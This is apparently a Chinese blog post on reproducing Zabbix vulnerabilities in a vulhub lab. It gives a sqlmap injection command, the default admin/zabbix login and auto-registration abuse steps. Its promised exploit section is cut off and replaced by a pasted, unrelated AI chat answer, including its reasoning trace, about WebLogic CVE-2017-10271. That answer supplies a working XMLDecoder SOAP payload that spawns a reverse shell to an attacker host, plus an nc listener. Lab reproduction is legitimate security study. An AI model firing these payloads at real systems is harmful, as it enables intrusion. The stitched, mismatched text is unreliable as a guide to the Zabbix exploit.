vulhub之Zabbix篇

本文详细介绍了Zabbix服务器监控软件中的两个漏洞,包括CVE-2016-10134的SQL注入漏洞和CVE-2017-2824/2020-11800的命令注入及远程代码执行问题,以及如何通过弱口令和自动注册功能进行攻击和利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CVE-2016-10134--SQL注入

一、漏洞介绍

zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。

漏洞环境

在vulhub靶场进行复现,启动zabbix 3.0.3。

二、复现步骤

1.启动漏洞环境

进入zabbix目录,cd进入CVE-2016-10134目录,输入以下命令启动靶场:

2、漏洞利用

zabbix的jsrpc.php页面存在sql漏洞,所以通过访问这个jsrpc.php页面来触发漏洞,漏洞参数是profileIdx2。发送如下请求包即可执行sql命令,获取数据库信息。
请求包信息如下:
python sqlmap.py -u "http://192.168.245.131:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1" --dbs

CVE-2017-2824--命令注入

CVE-2020-11800--远程代码执行

弱口令登录系统 使用账号密码admin/zabbix登录后台

添加自动注册规则
访问portal登录,
依次点击菜单Configuration->Actions,将Event source调整为Auto registration

点击Create action后,第一个页签随便写一个备注

第二个页签设置条件

可配置host name、proxy和host metadata包含或不包含某个关键字,
为了复现方便这里留空。

第三个页签,指定操作,可以为发送消息、添加主机等,这里要选择Add host。

以上规则的意思就是任意自动注册的host,没有任何拒绝规则,都会直接添加到server中。

注册host
就开启了自动注册功能

利用exp写入木马

<think>好的,用户想了解在Vulhub靶场上设置或利用CVE-2017-10271漏洞的方法。首先,我需要回忆一下这个漏洞的基本情况。CVE-2017-10271是WebLogic的一个远程代码执行漏洞,由于XML反序列化处理不当导致攻击者可以发送恶意请求执行任意命令。 接下来,用户提到的是Vulhub靶场,所以我需要确认Vulhub是否包含这个漏洞的环境。根据提供的引用内容,引用[4]提到了weblogic cve-2017-10271漏洞复现,但用户提供的引用中并没有直接给出Vulhub的配置步骤,而是提到了vulfocus。可能用户混淆了不同靶场,但Vulhub确实有多个WebLogic漏洞的环境,需要检查是否存在CVE-2017-10271的具体配置。 首先,用户需要搭建Vulhub环境。通常步骤是安装Docker和docker-compose,然后从Vulhub的GitHub仓库下载环境。接着在对应漏洞目录下启动容器。假设Vulhub中有该漏洞的环境,用户需要进入对应的目录,比如vulhub/weblogic/CVE-2017-10271,执行docker-compose up -d启动环境。 然后是漏洞利用部分。该漏洞利用通常涉及发送构造的XML请求到WebLogic的wls-wsat组件。使用工具如curl或Python脚本发送恶意HTTP POST请求,其中包含反序列化payload,比如通过XML中嵌入Java代码执行命令。例如,用户可能使用反弹shell的命令,将bash -i重定向到攻击者的监听端口。 需要注意的地方包括确保靶场环境正确启动,端口开放,以及替换利用代码中的IP和端口为实际的攻击机地址。此外,测试完毕后要关闭环境,避免留下安全隐患。 用户可能遇到的问题包括环境配置错误、依赖未安装,或者利用代码的格式问题。需要提醒用户检查Docker服务状态,确认目录正确,以及利用代码中的特殊字符是否正确转义。 最后,按照用户要求生成相关问题,可能需要涵盖漏洞原理、其他相关漏洞、防护措施以及调试方法等。</think>### Vulhub靶场中CVE-2017-10271漏洞配置与利用方法 #### 环境搭建步骤 1. **安装Docker与Vulhub** 确保系统已安装Docker和docker-compose,通过以下命令拉取Vulhub漏洞库: ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/weblogic/CVE-2017-10271 docker-compose up -d ``` 启动后,WebLogic服务将运行在`http://靶机IP:7001`。 2. **验证环境** 访问`http://靶机IP:7001/console`,若出现WebLogic登录页面,则环境搭建成功[^4]。 --- #### 漏洞利用方法 1. **构造恶意请求** 漏洞存在于`wls-wsat`组件的XML反序列化处理。通过发送包含恶意代码的POST请求触发漏洞。 **示例Payload**(反弹Shell): ```http POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 靶机IP:7001 Content-Type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"><string>/bin/bash</string></void> <void index="1"><string>-c</string></void> <void index="2"><string>bash -i >& /dev/tcp/攻击机IP/监听端口 0>&1</string></void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ``` 2. **启动监听并触发漏洞** - 攻击机上执行: ```bash nc -lvp 监听端口 ``` - 发送上述Payload至目标服务器,成功后将在攻击机获得Shell权限。 --- #### 关键注意事项 1. **特殊字符转义** XML中需对`&`, `>`等符号转义,例如将`>`替换为`&gt;`,否则请求会因格式错误被拒绝。 2. **环境清理** 测试完成后执行: ```bash docker-compose down ``` --- #### 漏洞原理分析 CVE-2017-10271因WebLogic的`wls-wsat`组件未严格过滤XML输入,导致攻击者可通过反序列化操作执行任意Java代码。其核心问题在于`XMLDecoder`未对输入数据做安全检查[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

咩了个咩咩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值